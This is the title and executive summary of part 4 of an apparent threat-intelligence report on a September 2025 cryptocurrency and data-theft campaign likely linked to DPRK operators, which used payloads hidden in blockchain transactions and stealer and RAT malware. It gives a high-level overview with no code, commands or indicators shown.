Cross-Chain TxDataHiding Crypto Heist: A Very (Very) Chainful Process (Part 4)

Executive summary: Ransom‑ISAC (with Crystal Intelligence and collaborators) investigated a September 2025 cryptocurrency and data-theft campaign likely linked to DPRK financial cyber operations, revealing a multi-stage attack that used phishing to seed a private weaponised GitHub repository, cross-chain TxDataHiding to deliver obfuscated payloads on public blockchains, takedown‑resistant blockchain-based C2 and downloaders that deployed OmniStealer and DEV#POPPER.JS RAT variants; the report provides timeline analysis, IOCs (IPs, wallet addresses, transaction hashes, malware SHA256s), on-chain fund tracing across TRON, BSC and other chains, and contextual attribution details including a Russian IP overlap and laundering patterns.